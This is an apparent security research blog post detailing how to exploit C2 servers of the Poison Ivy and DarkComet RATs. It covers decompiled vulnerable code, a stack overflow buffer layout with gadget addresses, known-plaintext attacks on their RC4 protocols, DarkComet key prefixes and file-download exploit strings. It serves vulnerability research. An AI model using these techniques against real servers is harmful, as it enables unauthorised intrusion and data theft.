Dead RATs: Exploiting malware C2 servers

This post is a bit of a follow-up to my post on exploiting a stack buffer overflow in Poison Ivy’s (>= 2.2.0) C2 server which discussed how to exploit that vulnerability without having access to the secret key used to encrypt PIVY traffic. In this post I’ll discuss exploiting a vulnerability in DarkComet’s C2 server as well as a new vulnerability affecting earlier versions of Poison Ivy. In both cases i’ll also discuss severe flaws in their cryptographic protocols which allow us to exploit these vulnerabilities without any knowledge of the secret key. Exploiting these vulnerabilities without requiring access to the secret key would be of interest in scenarios where C2 administrators change keys over time, where infected samples are sparsely distributed, where one encounters a series of C2 servers hosting different campaigns or where one actively hunts for C2 servers around the web. Included with this post are some metasploit modules i made.

A brief note on terminology: throughout this post i’ll refer to the malicious binary running on the infected machine as the ‘client’ and to the command & control (C2) side as the ‘server’, though in RAT/bot terminology it is usually the other way around it makes little sense to talk about a ‘C2 client’ in my opinion.

Intro

These cases are fairly interesting not because they are at the top of the malware foodchain (though they are, despite age and problems, still surprisingly widely used by cybercriminals and suspected nation-state attackers alike) or because exploiting aging malware is all that exciting but because they show how vulnerable code and bad cryptographic protocol design can be exploited together to create pretty powerful exploits and show that, like antivirus (eg. ESET, TrendMicro, Kaspersky, Sophos) software or network security equipment (eg. FireEye), malware is often terribly insecure itself. Just because it’s “security software” doesn’t mean it’s secure software.

Furthermore there seems to be all sorts of interest in exploiting RAT/botnet C2 servers ranging from security researchers tracking botnets or taking them over (sometimes targeting exploit kits as well) and the notorious debate on ‘hacking back’ (eg. when Team High Tech Crime of the Dutch police apparently hacked a BlackShades C2 server (source in Dutch)) to three-letter agencies hovering up bots left and right under the auspices of projects with names like HIDDENSALAMANDER and DEFIANTWARRIOR. What’s interesting about these NSA projects is that HIDDENSALAMANDER seems to focus on tracking and identifying botnet activity via traffic detection (and where possible decoding and processing) while DEFIANTWARRIOR seems to focus on ‘bot herding’, ie. taking over botnets for their own purposes. The slides of the DEFIANTWARRIOR presentation explicitly state such end-goals as using hijacked bots as ‘pervasive network analysis vantage points’ (ie. nodes from which to observe networks otherwise out of reach) or ‘throw-away non-attributable CNA nodes’ (ie. to serve as proxies, potentially for hacking). The slides discuss how the XKEYSCORE system can be used to identify exploitable bots and how the TURMOIL system can then be tasked to watch for such traffic with TURBINE generating a Man-On-The-Side (MOTS) packet to hijack control of the bot.

Tellingly, the slides give some insight into the NSA’s concern for attribution-avoidance as a motivating factor by stating they wish to ‘walk the line: be awesome enough to be useful and not get caught trivially, but not as awesome as a state actor and notice when we do get burned’. All in all, exploitation of malware (botnet/RAT C2 servers, exploit kit control panels, etc.) is a pretty interesting and understudied subject.

Poison Ivy 2.1.x

The PIVY vulnerability i mentioned earlier affects versions 2.2.0 through 2.3.2 (the final release). I noted that PIVY versions before 2.2.0 were not affected by this vulnerability nor by the encryption oracle I discovered, seeing as how the PIVY protocol prior to 2.2.0 is different and makes use of the RC4 stream cipher rather than the Camellia block cipher. Since the vulnerability in versions 2.2.0 and up always struck me as rather weird (almost looking like a ‘bugdoor’ as noted by Gal Badishi) i decided to take a look at older versions of PIVY some time ago to see if similar flaws were present there and if so, provide a working exploit making C2 servers of most (if not all) of the PIVY family exploitable. As listed by megasecurity there are several PIVY versions preceding 2.2.0 but i decided to start by looking at 2.1.4 (released in May 2006, a decade ago).

Reverse Engineering the PIVY 2.1.4 C2 server

I started out by downloading an old copy of the PIVY 2.1.4 release and going through the usual static RE steps (doing the reversing on a Windows XP SP3 (32-bit) VM seeing as how PIVY is quite a relic):

> file "PI 2.1.4.exe"
PI 2.1.4.exe; PE32 executable for MS Windows (GUI) Intel 80386 32-bit

> trid.exe "PI 2.1.4.exe"

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  6880
Analyzing...

Collecting data from file: PI 2.1.4.exe
 46.9% (.EXE) Win32 Executable Borland Delphi 7 (664799/41/58)
 31.8% (.EXE) Win32 Executable Borland Delphi 5 (451463/56/28)
 18.5% (.EXE) Win32 Executable Borland Delphi 6 (262644/60)
  1.0% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  0.9% (.SCR) Windows screen saver (13101/52/3)

Looks like we’re dealing with an unpacked/non-crypted binary developed with Borland Delphi so static analysis through disassembly and decompilation should be easy enough. However, in order to speed things up a bit (since we don’t need a comprehensive understanding of the entire application to find a suitable vulnerability) we want to identify the network communications handling routine since if there is a similar vuln to that of later versions it’s probably located there. One way to do this is to look for references to WSAStartup, bind, etc. and work out what’s happening from there. Another way is to rely on the fact that PIVY 2.1.4 advertises itself as having ‘transparent compression of transfers and communications’ and we know newer versions of PIVY did this by using RtlCompressBuffer & RtlDecompressBuffer functions with the COMPRESSION_FORMAT_LZNT1 algorithm so we can look for references to those APIs and check out the routines using them. We run the PIVY C2 through a debugger, set a breakpoint on RtlDecompressBuffer, fire up an infected client on a VM so the communication will trigger the right routine and trace our way back to where we were called from. This points us to a routine I dubbed socket_reader. After decompilation and some variable renaming we can see the following core elements of the relevant function:

DWORD __usercall socket_reader@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>, LPVOID lpThreadParameter)
{
  (...)
  char dstBuffer; // [sp+126h] [bp-2586h]@12
  char compressedBuffer; // [sp+1577h] [bp-1135h]@12
  char srcBuffer; // [sp+157Bh] [bp-1131h]@18
  fd_set readfds; // [sp+2578h] [bp-134h]@1
  int compressionType; // [sp+267Ch] [bp-30h]@1
  int decompressionSize; // [sp+2680h] [bp-2Ch]@17
  int pDestinationSize; // [sp+2684h] [bp-28h]@17
  int infoSize; // [sp+2688h] [bp-24h]@14
  unsigned int headerAllocSize; // [sp+268Ch] [bp-20h]@1
  LPVOID decompressBuffer; // [sp+2690h] [bp-1Ch]@8
  LPARAM lParam; // [sp+2696h] [bp-16h]@2
  struct timeval timeout; // [sp+269Ch] [bp-10h]@2
  HWND hWnd; // [sp+26A4h] [bp-8h]@1
  SOCKET s; // [sp+26A8h] [bp-4h]@1
  int savedregs; // [sp+26ACh] [bp+0h]@1

  v16 = a1;
  v15 = a3;
  v14 = a2;
  hWnd = (HWND)*((_DWORD *)lpThreadParameter + 1);
  s = *(_DWORD *)lpThreadParameter;
  headerAllocSize = 0;
  compressionType = 2;

  (...)

  while ( 1 )
  {
    (...)

    if ( *(LPARAM *)((char *)&lParam + 2) <= headerAllocSize )
    {
      Windows::ZeroMemory(decompressBuffer, *(LPARAM *)((char *)&lParam + 2));
    }
    else
    {
      if ( headerAllocSize )
        VirtualFree_0(decompressBuffer, 0, 0x8000u);
      decompressBuffer = VirtualAlloc_0(0, *(LPARAM *)((char *)&lParam + 2), 0x1000u, 4u);
      headerAllocSize = *(LPARAM *)((char *)&lParam + 2);
    }
    v19 = 0i64;
    while ( *(unsigned int *)((char *)&lParam + 2) > (signed __int64)(unsigned int)v19 )
    {
      Windows::ZeroMemory(&compressedBuffer, 0x1001u);
      Windows::ZeroMemory(&dstBuffer, 0x1451u);

      (...)

      if ( select(0, &readfds, 0, 0, &timeout) <= 0 )
      {
        __writefsdword(0, (unsigned int)v8);
        break;
      }
      __writefsdword(0, (unsigned int)v8);
      infoSize = 0;
      if ( !(unsigned __int8)sub_4950A4(&s, &infoSize, 4) || !(unsigned __int8)sub_4950A4(&s, &compressedBuffer, infoSize) )
      {
        break;
      }
      v5 = infoSize;
      if ( infoSize )
      {
        sub_4E78F4((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);
        sub_407800(&decompressionSize, &compressedBuffer, 4);
        pDestinationSize = decompressionSize;
        if ( v5 - 4 == decompressionSize )
        {
          System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);
        }
        else
        {
          RtlDecompressBuffer(compressionType, &dstBuffer, decompressionSize, &srcBuffer, v5 - 4, &pDestinationSize);
          System::Move(&dstBuffer, (char *)decompressBuffer + v19, pDestinationSize);
        }
        v19 += (unsigned int)decompressionSize;
        wParam += (unsigned int)(v5 - 4);
        v20 = GetTickCount_0() - v4;
        v21 = 0;
        PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
      }
    }

Now that we have an ‘area of interest’ for later careful scrutinizing the next thing we want some clarity on is the PIVY 2.1.x protocol, or at least what we need to know about it in order to comfortably do further reversing and exploitation. I simply used WireShark to capture several server-client sessions. This process revealed the following protocol structure which differs significantly from that of PIVY >= 2.2.0:

Infected -> C2:
0x01

C2 -> Infected:
{binary blob}

Infected -> C2:
{binary blob}

I suspected the first binary blob (transmitted from C2 to infected client) would contain information and code the infected client would use and run (seeing as how PIVY clients are very lean and get at lot of their malicious code dynamically from the C2 server) and the second binary blob would be an informational message (probably some ‘new client announcement’ message). In order to get a clearer look at what’s inside that first binary blob (from C2 to infected client) I took a look at which parts of the blob remained constant despite changes in cryptographic keys to identify what was plaintext and what was ciphertext, assuming the plaintext would be some sort of initial PIVY protocol metadata. This revealed the first 0xB9E bytes where plaintext (with the first 0x1E4 bytes of that being consistently constant) with the 0x855 succeeding bytes being highly entropic (and thus probably ciphertext).

In order to understand how the sent packets are structured I simply put a breakpoint on the send API, ran the C2 server, started up my MITM script and the infected client and waited until the server hit the breakpoint. Then the MITM script would show what had been sent in one go and to what routine within PIVY it would return. This revealed the binary blob actually consisted of several ‘packets’ (at the PIVY-protocol level) structured roughly as follows:

- PACKET 1 (0xB9E bytes):
	- 0x1E4 bytes segment (PLAINTEXT)
	[89]: identifier
	[ff]: cmd
	[900b0000]: little endian length dword (decompressed length for allocation)

	- 0x1DE bytes segment (PLAINTEXT)
		[940b0000]: little endian length dword
		(...): intermediate bytes
		[ba090000]: little endian length dword (next segment size)

	- 0x9BA bytes segment (PLAINTEXT)
		(...): some bytes

- PACKET 2 (0x855 bytes):
	- (ENCRYPTED)

Within the routines doing the sending, receiving, compressing and decompressing there had to be a call to the encryption/decryption function which can be found quite quickly if you know how to identify RC4 (hint: two subsequent loops iterating over 0x100 elements for the s-box key scheduler and a streaming loop doing mod-0x100 indexing of this s-box and xoring the end-result with the plaintext):

sub_4E786C((int)&v17, (int)lpThreadParameter + 12);
if ( !(unsigned __int8)sub_4950A4(&s, (int)&lParam, 6) )
	goto LABEL_23;
sub_4E78F4((int)&v17, (int)&lParam, (int)&lParam, 6);

(...)

sub_4E78F4((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);

We can recognize sub_4E786C as an implementation of the RC4 key-scheduler (with a hardcoded 11 byte (88-bit) limit on the keys) and sub_4E78F4 as an implementation of the RC4 PRNG & encryption/decryption functionality:

int __stdcall sub_4E786C(int a1, int a2)
{
  int v2; // eax@1
  unsigned __int8 v3; // dl@3
  signed int v4; // esi@3
  int result; // eax@3
  char v6; // cl@5
  char v7; // ST13_1@9

  *(_BYTE *)(a1 + 256) = 0;
  *(_BYTE *)(a1 + 257) = 0;
  v2 = 0;
  do
  {
    *(_BYTE *)(a1 + (unsigned __int8)v2) = v2;
    ++v2;
  }
  while ( (_BYTE)v2 );
  v3 = 0;
  v4 = 0;
  result = 0;
  do
  {
    if ( v4 >= 11 )
      v6 = 0;
    else
      v6 = *(_BYTE *)(a2 + v4);
    if ( ++v4 >= 11 )
      v4 = 0;
    v3 += *(_BYTE *)(a1 + (unsigned __int8)result) + v6;
    v7 = *(_BYTE *)(a1 + (unsigned __int8)result);
    *(_BYTE *)(a1 + (unsigned __int8)result) = *(_BYTE *)(a1 + v3);
    *(_BYTE *)(a1 + v3) = v7;
    ++result;
  }
  while ( (_BYTE)result );
  return result;
}

int __stdcall sub_4E78F4(int a1, int a2, int a3, int a4)
{
  int v4; // esi@1
  int v5; // ecx@1
  char v6; // dl@2

  v4 = a4;
  v5 = 0;
  do
  {
    v6 = *(_BYTE *)(a1 + ++*(_BYTE *)(a1 + 256));
    *(_BYTE *)(a1 + 257) += v6;
    *(_BYTE *)(a1 + *(_BYTE *)(a1 + 256)) = *(_BYTE *)(a1 + *(_BYTE *)(a1 + 257));
    *(_BYTE *)(a1 + *(_BYTE *)(a1 + 257)) = v6;
    *(_BYTE *)(a3 + v5) = *(_BYTE *)(a1 + (unsigned __int8)(*(_BYTE *)(a1 + *(_BYTE *)(a1 + 256)) + v6)) ^ *(_BYTE *)(a2 + v5);
    ++v5;
    --v4;
  }
  while ( v4 );
  return a4;
}

As the RC4 specs never explicitly required the use of an IV this is, of course, omitted and the password specified by the operator of the C2 is either cut to 11 bytes or padded using null-bytes thus initializing as follows rc4_ksa(pad(password)). Now that we know a bit more about the internal workings of the PIVY 2.1.x protocol we can take some of our captured data and decrypt it to see what’s being sent around without having to do tedious extra dynamic RE:

- PACKET 2 (0x855 bytes):
	- 6 bytes segment (ENCRYPTED)
		[89]: identifier
		[00]: cmd
		[690C0000]: little endian length dword

	- 0x84F bytes segment
		[4B080000]: length of packetdata to follow (PLAINTEXT)

		- 0x84B bytes (ENCRYPTED)
			[E(690C0000)]: 4 bytes specifying compressed size
			[...]: y bytes of compressed payload
			[...]: ....?

It turns out parts of the data being sent around here is constant (being compressed malicious code) which is good to keep in mind for the later stage where we will have to attack the crypto to get reliable exploitation.

Finding a vulnerability

Now that we have a rough idea of the first stages of the protocol and a notion of where and how the packet processing happens, that should be enough to find a vulnerability right? Let’s take a look at this really interesting sequence in socket_reader:

  char dstBuffer; // [sp+126h] [bp-2586h]@12
  char compressedBuffer; // [sp+1577h] [bp-1135h]@12

  (...)

      if ( !(unsigned __int8)recv_from(&s, (int)&infoSize, 4)
        || !(unsigned __int8)recv_from(&s, (int)&compressedBuffer, infoSize) )
      {
        break;
      }
      v5 = infoSize;
      if ( infoSize )
      {
        rc4_crypt((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);
        sub_407800(&decompressionSize, &compressedBuffer, 4);
        pDestinationSize = decompressionSize;
        if ( v5 - 4 == decompressionSize )
        {
          System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);
        }
        else
        {
          RtlDecompressBuffer(compressionType, &dstBuffer, decompressionSize, &srcBuffer, v5 - 4, &pDestinationSize);
          System::Move(&dstBuffer, (char *)decompressBuffer + v19, pDestinationSize);
        }

Where recv_from looks as follows:

int __fastcall sub_4950A4(SOCKET *a1, int a2, int a3)
{
  int v3; // esi@1
  int v4; // ebp@1
  SOCKET *v5; // ebx@1
  int v6; // edi@1
  int result; // eax@2
  char v8; // [sp+0h] [bp-14h]@1

  v3 = a3;
  v4 = a2;
  v5 = a1;
  v8 = 0;
  v6 = 0;
  while ( 1 )
  {
    result = recv(*v5, (char *)(v6 + v4), v3, 0);
    if ( result == -1 || !result || *v5 == -1 || !*v5 )
      break;
    v6 += result;
    v3 -= result;
    if ( !v3 )
    {
      v8 = 1;
      break;
    }
  }
  LOBYTE(result) = v8;
  return result;
}

If you look carefully you can see recv here is called with a variable length argument a3 which is 4 for the first call (receiving the length field) but infoSize for the second call (being the received length field). We can also see that the buffer recv_from writes to (argument a2) is the buffer compressedBuffer in the second call which is a fixed-size stack buffer. There are no bounds checks present on the infoSize variable, received directly from the network, however which means we’ve got ourselves a stack buffer overflow here. And while this one is different from the vulnerability in PIVY >= 2.2.0 it’s equally obvious, meaning PIVY C2 servers have always been vulnerable down to at least 2.1.x.

Exploiting the vulnerability: gaining EIP control

The next step here is to exploit this stack buffer overflow into gaining arbitrary code execution on the C2 server. We can overflow compressedBuffer into the saved return address on the stack:

-00001135 compressedBuffer db ?
(...)
-00000134 readfds         fd_set ?
-00000030 compressionType dd ?
-0000002C decompressionSize dd ?
-00000028 pDestinationSize dd ?
-00000024 infoSize        dd ?
-00000020 headerAllocSize dd ?
-0000001C decompressBuffer dd ?                   ; offset
-00000018                 db ? ; undefined
-00000017                 db ? ; undefined
-00000016 lParam          dd ?
-00000012                 db ? ; undefined
-00000011                 db ? ; undefined
-00000010 timeout         timeval ?
-00000008 hWnd            dd ?                    ; offset
-00000004 s               dd ?
+00000000  s              db 4 dup(?) <--- saved register (framepointer)
+00000004  r              db 4 dup(?) <--- saved return address on stack

This means that in order to get EIP-control we will have to:

Craft a packet that triggers the overflow
Make sure the control-flow reaches the end of the function and returns properly so we get EIP-control

The first we can do by crafting a packet of the form:

[mal_header (6 bytes)] [flen (4 bytes)] [infoLen (4 bytes)] [compressedBuffer (0xFFD bytes)] [readfds (0x104 bytes)] [compressionType (4 bytes)] [decompressSize (4 bytes)] [pDestinationSize (4 bytes)] [infoSize (4 bytes)] [headerAllocSize (4 bytes)] [decompressBuffer (4 bytes)] [junk (16 bytes)] [hWnd (4 bytes)] [socket s (4 bytes)] [saved s (4 bytes)] [saved r (4 bytes)]

Where:

infoLen = payloadlen
infoSize = infoLen + 4
flen = size of following data blob
saved r = target EIP

And mal_header is the ciphertext of "\x89\x01" + pack('I', allocSize) where allocSize is the length of the entire above buffer (save for the 6 mal_header bytes) plus 1024. This mal_header is the initial packet header crafted to accomodate the following code (from socket_reader):

 if ( !(unsigned __int8)recv_from(&s, (int)&lParam, 6) )
      goto LABEL_23;
    rc4_crypt((int)&v17, (int)&lParam, (int)&lParam, 6);
    if ( (_BYTE)lParam != 0x89u )
      goto LABEL_23;
    v4 = GetTickCount_0();
    Windows::ZeroMemory(&wParam, 0x20u);
    v22 = *(LPARAM *)((char *)&lParam + 2);
    v23 = 0;
    PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
    if ( *(LPARAM *)((char *)&lParam + 2) <= headerAllocSize )
    {
      Windows::ZeroMemory(decompressBuffer, *(LPARAM *)((char *)&lParam + 2));
    }
    else
    {
      if ( headerAllocSize )
        VirtualFree_0(decompressBuffer, 0, 0x8000u);
      decompressBuffer = VirtualAlloc_0(0, *(LPARAM *)((char *)&lParam + 2), 0x1000u, 4u);
      headerAllocSize = *(LPARAM *)((char *)&lParam + 2);
    }
    v19 = 0i64;
    while ( *(unsigned int *)((char *)&lParam + 2) > (signed __int64)(unsigned int)v19 )
    {
      Windows::ZeroMemory(&compressedBuffer, 0x1001u);
      Windows::ZeroMemory(&dstBuffer, 0x1451u);

Here we can see it receives 6 bytes from the network, decrypts them, checks if the first byte is 0x89 and if so treats the DWORD at offset 2 as a size field for a buffer to be allocated. If a buffer of that size or larger was already allocated the code merely cleans that buffer memory, otherwise it frees any older buffer and allocates a new one using VirtualAlloc. The code then continues onto the vulnerable part where this line handles the rest of the packet:

 if ( !(unsigned __int8)recv_from(&s, (int)&infoSize, 4) || !(unsigned __int8)recv_from(&s, (int)&compressedBuffer, infoSize) )

First it receives the infoSize field and then reads infoSize bytes from the network. The function then continues onward as follows:

 	  v5 = infoSize;
      if ( infoSize )
      {
        rc4_crypt((int)&v17, (int)&compressedBuffer, (int)&compressedBuffer, infoSize);
        sub_407800(&decompressionSize, &compressedBuffer, 4);
        pDestinationSize = decompressionSize;
        if ( v5 - 4 == decompressionSize )
        {
          System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);
        }
        else
        {
          RtlDecompressBuffer(compressionType, &dstBuffer, decompressionSize, &srcBuffer, v5 - 4, &pDestinationSize);
          System::Move(&dstBuffer, (char *)decompressBuffer + v19, pDestinationSize);
        }
        v19 += (unsigned int)decompressionSize;
        wParam += (unsigned int)(v5 - 4);
        v20 = GetTickCount_0() - v4;
        v21 = 0;
        PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
      }
    }
    v10 = &savedregs;
    v9 = &loc_4F08F7;
    v8 = (HWND)__readfsdword(0);
    __writefsdword(0, (unsigned int)&v8);
    Windows::ZeroMemory(&v17, 0x102u);
    SendMessageA(*((HWND *)lpThreadParameter + 2), 0x402u, wParam + 6, v19 + 6);
    Windows::ZeroMemory(&wParam, 0x20u);
    PostMessageA(hWnd, 0x402u, (WPARAM)&wParam, 1);
    SendMessageA(hWnd, 0x401u, (WPARAM)decompressBuffer, (LPARAM)&lParam);
    __writefsdword(0, (unsigned int)v8);
  }
  __writefsdword(0, (unsigned int)v8);
LABEL_23:
  __writefsdword(0, (unsigned int)v11);
  v13 = (int *)&loc_4F0977;
  v12 = &savedregs;
  v11 = &loc_4F0965;
  v10 = (int *)__readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  v9 = 0;
  v8 = hWnd;
  v6 = (HWND)Controls::TWinControl::GetHandle((Controls::TWinControl *)*off_51AA4C);
  SendMessageA(v6, 0x404u, (WPARAM)v8, (LPARAM)v9);
  closesocket(s);
  System::__linkproc__ FreeMem(lpThreadParameter);
  result = 0;
  __writefsdword(0, (unsigned int)v10);
  return result;

In order to gain EIP-control we need to ensure the code arrives without problems at the function return and to ease exploitation we want to avoid having to deal with decompression of our code (on top of the encryption already bothering us) as well as have any payload and exploit-critical data we embed ‘survive’ the ZeroMemory calls in between. As such we have to take particular care in setting the following elements of our buffer:

The DWORD that will overwrite the decompressSize value
The DWORD that will overwrite the infoSize value
The DWORD that will overwrite the decompressBuffer pointer

The first two will determine whether decompression will take place or not while the third one will be the destination address of a Move call (which is more or less Delphi’s memcpy with form move(src, dst, len)).

The PostMessageA call can deal with an invalid hWnd and the ZeroMemory calls merely determine where we don’t want to place any shellcode we might want to include in our buffer seeing as how they don’t zero out any areas we care about after the saved return address has been overwritten.

In order to test this we will have to know the secret RC4 key in order to encrypt our packet (since it will be decrypted before the function returns and we gain EIP-control) so for now we simply assume we are attacking a C2 server for which we have a corresponding infected client from which we extracted the password/key. Combining the above information allows us to hijack control-flow and redirect it to eg. 0xdeadbeef as can be seen in the Immunity Debugger screenshot below:

alt eip_control

Exploiting the vulnerability: from EIP control to arbitrary code execution

Now that we have EIP control we can craft an arbitrary code execution scenario. Usually this is the point to start worrying about exploit mitigations such as DEP, ASLR, stack cookies, etc. but luckily for us none of this is at play here as PIVY is a non-DEP, non-ASLR compatible executable which means we don’t have to worry about any of that:

Usually we would go for a simple jmp esp + shellcode append scenario here but there’s one problem: the exploited function’s stackframe resides near its thread’s stacktop meaning we barely have any space for a decent payload there:

alt stacktop

We can address this problem by using a small ‘detouring shellcode’ appended to our buffer which redirects control-flow to the actual shellcode located somewhere within our buffer. The only problem here is that by the time we reach the vulnerable function return, most of the buffer is eradicated by ZeroMemory calls meaning our shellcode is erased by the time control-flow reaches it. It turns out, however, we have a very powerful exploitation primitive to address this issue as well:

System::Move(&srcBuffer, (char *)decompressBuffer + v19, decompressionSize);

Here we have full control over all parameters to that previously pesky Move call which means we have a Write-Anything-Anywhere (WAA) primitive which is called before any of our buffer gets erased. This means we can use the WAA primitive to relocate decompressionSize amount of bytes from the srcBuffer part of our packet to the address we overwrote the decompressBuffer pointer with. Now all we need is a suitable destination where we will ‘backup’ our shellcode and then we can overwrite the saved return address with the address of a jmp esp which will execute the tiny ‘detour shellcode’ redirecting control-flow to the shellcode-backup area. I chose the start of the .tls section (0x00520000) for this purpose. The detour shellcode is a simple mov eax, 0x00520000; jmp eax sequence and the jmp esp can be found at address 0x00469159 in ‘PIVY 2.1.4.exe’ (amid what amounts to a treasure chest of gadgets):

CODE:00469155 ; ---------------------------------------------------------------------------
CODE:00469155                 jmp     esi
CODE:00469157 ; ---------------------------------------------------------------------------
CODE:00469157                 jmp     ebp
CODE:00469159 ; ---------------------------------------------------------------------------
CODE:00469159                 jmp     esp

With this information we can build a reliable exploit giving us arbitrary code execution. The only thing that’s still standing in our way is the fact that it’s effectively a ‘post-auth’ vuln as we need to know the shared secret key to encrypt part of the crafted buffer which will be decrypted. Knowing such a key is easy enough once an infected sample has been discovered but a ‘pre-auth’ exploit is always preferable over a ‘post-auth’ one and being able to yield it against every PIVY C2 server makes it a bit more interesting.

From post-auth to pre-auth: breaking the PIVY 2.1.x crypto

As noted by megasecurity PIVY 2.1.4 and prior make use of the RC4 stream cipher. Now, RC4 should be considered thoroughly broken but it was reasonable to use it back when PIVY was developed. Besides, the problem here isn’t so much the usage of RC4 as the security design of the protocol. As can be seen in the image below, the keystreams between sender and receiver run synchronously (probably because separate RC4 instances are running for sending and receiving within a given process to ensure automatic synchronization):

This means that if we receive a bunch of ciphertext from the C2 server for which we know the plaintext, we can derive the corresponding keystream through a known plaintext attack (which, for streamciphers, is just a XOR between known plaintext and ciphertext). We can then reuse this derived keystream to encrypt the required parts of our exploit buffer without having to know any secret key at all. Again an implementation mistake in the cryptographic protocol allows us to make an exploit against an instance of PIVY to be that much more powerful. Goes to show that secure cryptographic protocol design is no trivial piece of cake.

Metasploit Module

I wrote a working MSF exploit (currently only targeting the version 2.1.4 instance) for the above vulnerability:

DarkComet

DarkComet is a very popular RAT that’s been around in one form or another since 2008 and has been used by everyone from your average script kiddie or would-be cybercriminal to ‘APT-style’ attackers engaging in Cyber-espionage operations, targeting oil transportation tankers or Syrian activists. It’s one of those typical off-the-shelf ‘Delphi RATs’ with a lot of built-in functionality and a pretty sleek C2 server GUI. It’s also a pretty typical RAT in that its C2 server has multiple vulnerabilities. As this 2012 paper from Matasano (now part of NCC Group) by Shawn Denbow and Jesse Hertz discusses the last non-legacy DarkComet release’s C2 server is vulnerable to both an SQL injection vulnerability and an arbitrary file download vulnerability allowing an attacker to download any file (including the C2 configuration file and its backend SQLite database) from the RAT C2 server. The latter vulnerability resides in DarkComet’s QuickUp command used for ad-hoc file down- and uploading as part of eg. the RAT’s file-editing capabilities as shown below:

alt darkcomet_quickup1

Denbow and Hertz noticed how there is no check that the file in both QUICKUP messages matches, absolute paths can be specified and that the C2 server will always respond to QUICKUP commands, even if they never issued one themselves. These flaws can be combined to allow an attacker to simply connect to the C2 server, complete the handshake and issue a malicious QUICKUP request to download any file as illustrated in this image from the paper:

alt darkcomet_quickup2

In the aftermath of the coverage on DarkComet’s usage by pro-Assad hackers against Syrian activists the RAT’s author discontinued its development, releasing only a final 5.4.1 legacy version (which doesn’t include a malicious executable builder) and cleanup tool. As such DarkComet is no longer actively developed or supported and the versions out there are and will remain vulnerable to this vulnerability.

The DarkComet protocol & confirming the vulnerability in other versions

Seeing as how this has been adequately covered already I’ll only briefly discuss the DarkComet protocol, for an in-depth RE look at DarkComet’s internals I’ll refer to the extensive prior work on the subject.

In order to test this vulnerability and quickly confirm it’s presence or absence on other versions what’s important for us to know is if and how DarkComet encrypts its traffic. As discussed in prior work, DarkComet encrypts its traffic (inconsistently, filetransfers seem to be sent in the clear while commands seem to be sent encrypted) using RC4 and then, for some reason, converts it to hex representation and sends it over the network:

As with PIVY, DarkComet initializes the RC4 KSA without IV and always prepends a static, version-specific, prefix to any user-chosen password eg. RC4(prefix + password). The prefixes are as follows:

darkcomet 2x/3x: #KCMDDC2#-890
darkcomet 4: #KCMDDC4#-890
darkcomet 42: #KCMDDC42#-890
darkcomet 42F: #KCMDDC42F#-890
darkcomet 5: #KCMDDC5#-890
darkcomet >= 5.1: #KCMDDC51#-890

If a user doesn’t specify a password the key consists of the prefix only. With this knowledge we can test the vulnerability against other versions of the DC C2 server. Testing confirmed all versions >= 5.1 were vulnerable to the exploit described by Denbow and Hertz but it turned out versions < 5.1 don’t use the QUICKUP command identifier. In order to see what was going on under the hood of those versions without doing a bunch of RE I simply set up a MITM script between a client and server configured with their default key which would decrypt all traffic and display it for inspection. Turns out DC versions 2.0 < x < 5.1 use “UPLOAD” as a command specifier and a slightly different protocol structure for essentially the same functionality and this command is vulnerable in the same manner. Versions 2.x and prior seem to use a different protocol which I didn’t look into any further. Either way, this confirms the majority of DC DC2 servers out there is vulnerable to this vulnerability but, like the PIVY case, if a C2 admin has specified a password an attacker would require a corresponding malicious binary to extract the key and mount the attack, again making this more or less a ‘post-auth’ vuln.

Breaking the DarkComet crypto

So DarkComet uses RC4, sure. But the choice of cryptographic primitive usually isn’t the bottleneck in security engineering, the cryptographic protocol design is and as with PIVY, it’s no different with DC. As it turns out it makes an even worse mistake than PIVY. Not only are keystreams synchronous between sender and receiver, the KSA gets reinitialized for every new sent message, meaning effectively only the first N bytes of keystream are ever used (where N is the longest plaintext sent) and making every ciphertext message a ‘parallel ciphertext’ to every other one (across sessions and across infected samples even), similar (but worse) to my attack on Hacking Team’s “core-packer”. This means that if we can get enough known plaintext, at any point during protocol communications, to match the length of our exploit string we can use it to derive the corresponding keystream, encrypt our exploit string and exploit the vulnerability without requiring knowledge of the secret key.

Let’s look at the DC protocol again using this sample by contextis to show the plaintext of a regular DC handshake:

C2: IDTYPE 
Infected: SERVER 
C2: GetSIN192.168.93.130|120826718 
Infected: infoesGuest16|192.168.93.130 / [192.168.93.130] : 1604|XP-CLIENT / Administrator|120826718|0s|Windows XP Service Pack 2 [2600] 32 bit ( C:\ )|x||US|Program Manager|b4c7d186b435fc77626a5ae904879815|275.65 MB/511.48 MB [235.84 MB Free]|English (United States) US / -- |9/22/2011 at 2:58:57 PM

So we have at least 6 bytes (IDTYPE) of known plaintext. How many do we need? If we take a look at the DarkComet C2’s config.ini we can see the following:

[SIN]
disclamer=0
help=0
MAXIMIZED=0
Ports=1604:YES;1605:YES;200:YES|3
(...)
[NOIP]
HOST=yourname.no-ip.org
USER=yourname@yourmail.com
PASS=123456789
AUTO=0
HIDE=1
[SECURITY]
PASSWD=admin

As you can see it contains both the password used to create the RC4 key as well as credentials to a no-ip dynamic DNS account which can be used to manage the C2 server’s domain name. Seeing as how this information is enough to recreate the actual RC4 key (and thus rerun the exploit with knowledge of the key and download any file we want) as well as potentially hijack/sinkhole the botnet this seems sufficient meaning our minimal exploit string would be QUICKUP1|config.ini| (20 bytes) for versions >= 5.1 and UPLOADconfig.ini|1|1| (21 bytes) for versions < 5.1. Note that since the actual file contents transmitted via the DarkComet protocol are done so in plaintext we don’t need any more keystream than what is required to cover the exploit string as we don’t have to decrypt the filecontent response. So let’s say we want to collect 21 bytes of keystream.

Consider this part of the handshake:

C2: IDTYPE 
Infected: SERVER 
C2: GetSIN192.168.93.130|120826718

